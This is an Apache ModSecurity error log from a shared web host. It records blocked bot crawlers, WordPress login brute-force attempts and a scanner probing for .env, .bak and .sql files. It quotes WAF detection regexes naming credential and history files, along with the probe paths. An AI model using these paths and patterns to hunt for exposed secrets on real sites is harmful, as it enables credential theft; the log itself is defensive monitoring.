[Tue May 26 19:48:17.184010 2026] [security2:error] [pid 77894:tid 78141] [client 114.119.145.65:22563] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rainadelproperties.com"] [uri "/area/queens/"] [unique_id "ahWrqTomEhVPuJoD1MZ7EQAAAHU"], referer: https://rainadelproperties.com/properties/luxury-villa-in-rego-park
[Tue May 26 19:48:17.900015 2026] [security2:error] [pid 77894:tid 78041] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrqTomEhVPuJoD1MZ7GgAAABE"]
[Tue May 26 19:48:19.654659 2026] [security2:error] [pid 77894:tid 77987] [remote 185.190.18.72:37980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.18.190.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWrqzomEhVPuJoD1MZ7VQAARVw"]
[Tue May 26 19:48:19.930337 2026] [security2:error] [pid 77894:tid 78119] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrqzomEhVPuJoD1MZ7WAAAAF8"]
[Tue May 26 19:48:20.764583 2026] [security2:error] [pid 77894:tid 78006] [remote 185.190.18.72:37980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.18.190.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWrrDomEhVPuJoD1MZ7hwAAb28"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:48:22.293088 2026] [security2:error] [pid 77894:tid 78059] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrrTomEhVPuJoD1MZ7pwAAACM"]
[Tue May 26 19:48:23.235827 2026] [security2:error] [pid 77894:tid 78069] [client 79.140.115.145:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrrjomEhVPuJoD1MZ7yQAAAC0"]
[Tue May 26 19:48:24.333638 2026] [proxy:warn] [pid 77894:tid 78144] [client 66.132.195.99:31298] AH01092: no HTTP 0.9 request (with no host line) on incoming request and preserve host set forcing hostname to be thedebateafrica.org for uri /400.shtml
[Tue May 26 19:48:24.333675 2026] [proxy:error] [pid 77894:tid 78144] (70014)End of file found: [client 66.132.195.99:31298] AH01095: prefetch request body failed to 127.0.0.1:8080 (127.0.0.1) from 66.132.195.99 ()
[Tue May 26 19:48:25.564976 2026] [security2:error] [pid 77894:tid 78113] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrsTomEhVPuJoD1MZ8DgAAAFk"]
[Tue May 26 19:48:27.434572 2026] [security2:error] [pid 77894:tid 78129] [client 114.119.159.26:38741] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cagmedya.com"] [uri "/bolu-web-tasarim/"] [unique_id "ahWrszomEhVPuJoD1MZ8TgAAAGk"], referer: https://trickyairbedshocks.com/s/cdn/?cagmedya.com
[Tue May 26 19:48:27.750450 2026] [security2:error] [pid 77894:tid 78027] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrszomEhVPuJoD1MZ8SwAAAAM"]
[Tue May 26 19:48:30.159354 2026] [security2:error] [pid 77894:tid 78016] [remote 103.95.119.103:34870] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWrtTomEhVPuJoD1MZ8nAAAWHk"]
[Tue May 26 19:48:30.779073 2026] [security2:error] [pid 77894:tid 78105] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrtjomEhVPuJoD1MZ8rgAAAFE"]
[Tue May 26 19:48:32.705018 2026] [security2:error] [pid 77894:tid 77912] [remote 109.205.180.55:60886] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.180.205.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWruDomEhVPuJoD1MZ81wAAfhE"]
[Tue May 26 19:48:33.400279 2026] [security2:error] [pid 77894:tid 78028] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWruDomEhVPuJoD1MZ86QAAAAQ"]
[Tue May 26 19:48:35.605086 2026] [security2:error] [pid 77894:tid 77921] [remote 74.206.180.196:49794] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.180.206.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWruzomEhVPuJoD1MZ9KgAAAho"]
[Tue May 26 19:48:35.998336 2026] [security2:error] [pid 77894:tid 78030] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWruzomEhVPuJoD1MZ9MAAAAAY"]
[Tue May 26 19:48:37.413748 2026] [security2:error] [pid 77894:tid 78019] [remote 209.42.19.17:36610] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.19.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWrvTomEhVPuJoD1MZ9VQAADXw"]
[Tue May 26 19:48:37.912097 2026] [security2:error] [pid 77894:tid 78142] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrvTomEhVPuJoD1MZ9agAAAHY"]
[Tue May 26 19:48:38.801472 2026] [security2:error] [pid 77894:tid 77928] [remote 74.206.180.196:49794] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.180.206.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWrvjomEhVPuJoD1MZ9igAAUCE"], referer: https://obinnawrites.com/wp-login.php
[Tue May 26 19:48:39.511542 2026] [security2:error] [pid 77894:tid 78035] [client 45.114.125.145:60876] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahWrvzomEhVPuJoD1MZ9pAAAAAs"], referer: https://bloggertarget.com/public/plugins/ckeditor/images/spacer.gif
[Tue May 26 19:48:40.643574 2026] [security2:error] [pid 77894:tid 78091] [client 45.114.125.145:32858] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWrwDomEhVPuJoD1MZ9vQAAAE0"], referer: https://bloggertarget.com/public/plugins/ckeditor/images/spacer.gif
[Tue May 26 19:48:41.284189 2026] [security2:error] [pid 77894:tid 78117] [client 45.114.125.145:60876] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahWrwTomEhVPuJoD1MZ95AAAAF0"], referer: https://bloggertarget.com/public/plugins/Ueditor/dialogs/attachment/fileTypeImages/icon_psd.gif
[Tue May 26 19:48:41.331495 2026] [security2:error] [pid 77894:tid 78029] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrwDomEhVPuJoD1MZ93QAAAAU"]
[Tue May 26 19:48:41.438414 2026] [security2:error] [pid 77894:tid 78036] [client 31.57.184.107:62145] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWrwTomEhVPuJoD1MZ96AAAAAw"], referer: https://wordpress.org/
[Tue May 26 19:48:42.381410 2026] [security2:error] [pid 77894:tid 78077] [client 45.114.125.145:32958] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWrwTomEhVPuJoD1MZ-AgAAAC0"], referer: https://bloggertarget.com/public/plugins/Ueditor/dialogs/attachment/fileTypeImages/icon_psd.gif
[Tue May 26 19:48:42.997647 2026] [security2:error] [pid 77894:tid 77945] [remote 141.95.202.18:50282] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWrwjomEhVPuJoD1MZ-IgAARDI"]
[Tue May 26 19:48:43.033872 2026] [security2:error] [pid 77894:tid 78095] [client 45.114.125.145:60876] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahWrwjomEhVPuJoD1MZ-JgAAAEc"], referer: https://bloggertarget.com/public/plugins/Ueditor/dialogs/attachment/images/alignicon.gif
[Tue May 26 19:48:43.835758 2026] [security2:error] [pid 77894:tid 78110] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrwzomEhVPuJoD1MZ-PQAAAFY"]
[Tue May 26 19:48:44.110847 2026] [security2:error] [pid 77894:tid 78063] [client 45.114.125.145:33072] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWrwzomEhVPuJoD1MZ-RwAAAHg"], referer: https://bloggertarget.com/public/plugins/Ueditor/dialogs/attachment/images/alignicon.gif
[Tue May 26 19:48:44.257653 2026] [security2:error] [pid 77894:tid 78039] [client 74.7.175.159:40246] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.trichycityag.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWrxDomEhVPuJoD1MZ-WgAADzc"]
[Tue May 26 19:48:45.425265 2026] [security2:error] [pid 77894:tid 77970] [remote 194.163.139.224:60928] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 224.139.163.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWrxTomEhVPuJoD1MZ-egAAPUs"]
[Tue May 26 19:48:46.465109 2026] [security2:error] [pid 77894:tid 78053] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrxTomEhVPuJoD1MZ-nAAAAB0"]
[Tue May 26 19:48:46.685164 2026] [security2:error] [pid 77894:tid 78094] [client 123.16.30.202:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrxjomEhVPuJoD1MZ-nwAAAEY"]
[Tue May 26 19:48:47.538428 2026] [security2:error] [pid 77894:tid 77982] [remote 194.163.139.224:60928] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 224.139.163.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWrxzomEhVPuJoD1MZ-ywAALFc"], referer: https://obinnawrites.com/wp-login.php
[Tue May 26 19:48:48.478189 2026] [security2:error] [pid 77894:tid 77957] [remote 38.95.35.74:33160] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahWryDomEhVPuJoD1MZ-5AAAFD4"]
[Tue May 26 19:48:48.562264 2026] [security2:error] [pid 77894:tid 78077] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWryDomEhVPuJoD1MZ-4AAAADU"]
[Tue May 26 19:48:48.717433 2026] [security2:error] [pid 77894:tid 77955] [remote 38.95.35.74:33160] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahWryDomEhVPuJoD1MZ-7wAATjw"], referer: https://hassina-foundation.com/wp-login.php
[Tue May 26 19:48:50.288719 2026] [security2:error] [pid 77894:tid 77959] [remote 49.12.3.147:34118] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWryjomEhVPuJoD1MZ_IwAAW0A"]
[Tue May 26 19:48:51.016762 2026] [security2:error] [pid 77894:tid 78056] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWryjomEhVPuJoD1MZ_OAAAACA"]
[Tue May 26 19:48:54.461493 2026] [security2:error] [pid 77894:tid 78115] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrzjomEhVPuJoD1MZ_oQAAAFs"]
[Tue May 26 19:48:56.972827 2026] [security2:error] [pid 77894:tid 78101] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWr0DomEhVPuJoD1MZ_8AAAAE0"]
[Tue May 26 19:48:59.147605 2026] [security2:error] [pid 77894:tid 77996] [remote 141.138.139.98:57730] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.139.138.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWr0jomEhVPuJoD1MaAKAAAZWU"]
[Tue May 26 19:48:59.612637 2026] [security2:error] [pid 77894:tid 78033] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWr0zomEhVPuJoD1MaAMwAAAAk"]
[Tue May 26 19:49:01.004578 2026] [security2:error] [pid 77894:tid 78117] [client 85.208.96.201:18182] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/list/"] [unique_id "ahWr1TomEhVPuJoD1MaAcgAAAF0"]
[Tue May 26 19:49:01.004728 2026] [security2:error] [pid 77894:tid 78117] [client 85.208.96.201:18182] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/list/"] [unique_id "ahWr1TomEhVPuJoD1MaAcgAAAF0"]
[Tue May 26 19:49:01.124561 2026] [security2:error] [pid 77894:tid 78009] [remote 141.138.139.98:57730] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.139.138.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWr1TomEhVPuJoD1MaAcwAAGHI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:49:01.742422 2026] [security2:error] [pid 77894:tid 78083] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWr1TomEhVPuJoD1MaAeQAAADs"]
[Tue May 26 19:49:01.995302 2026] [security2:error] [pid 77894:tid 77898] [remote 49.12.3.147:56504] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWr1TomEhVPuJoD1MaAkAAADQM"]
[Tue May 26 19:49:04.006755 2026] [security2:error] [pid 77894:tid 78097] [client 185.177.72.53:56142] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/user.php.old"] [unique_id "ahWr2DomEhVPuJoD1MaAwgAAAEk"]
[Tue May 26 19:49:04.653284 2026] [security2:error] [pid 77894:tid 78024] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWr2DomEhVPuJoD1MaAyQAAAAA"]
[Tue May 26 19:49:04.818285 2026] [security2:error] [pid 77894:tid 78044] [client 185.177.72.53:56142] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/process.php.bak"] [unique_id "ahWr2DomEhVPuJoD1MaA4AAAABQ"]
[Tue May 26 19:49:05.627110 2026] [security2:error] [pid 77894:tid 78095] [client 185.177.72.53:56142] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/sources/.env"] [unique_id "ahWr2TomEhVPuJoD1MaA_QAAAEc"]
[Tue May 26 19:49:06.597840 2026] [security2:error] [pid 77894:tid 78141] [client 185.177.72.53:56142] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/food-app/.env"] [unique_id "ahWr2jomEhVPuJoD1MaBGQAAAHU"]
[Tue May 26 19:49:06.759004 2026] [security2:error] [pid 77894:tid 78106] [client 185.177.72.53:56142] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/db_backup.sql"] [unique_id "ahWr2jomEhVPuJoD1MaBIAAAAFI"]
[Tue May 26 19:49:07.565747 2026] [security2:error] [pid 77894:tid 78084] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWr2zomEhVPuJoD1MaBLwAAADw"]
[Tue May 26 19:49:07.734365 2026] [security2:error] [pid 77894:tid 78119] [client 185.177.72.53:56142] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/gifts/.env"] [unique_id "ahWr2zomEhVPuJoD1MaBQgAAAF8"]
[Tue May 26 19:49:07.907114 2026] [autoindex:error] [pid 77894:tid 78098] [client 185.177.72.53:56142] AH01276: Cannot serve directory /home1/pronuyyv/public_html/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
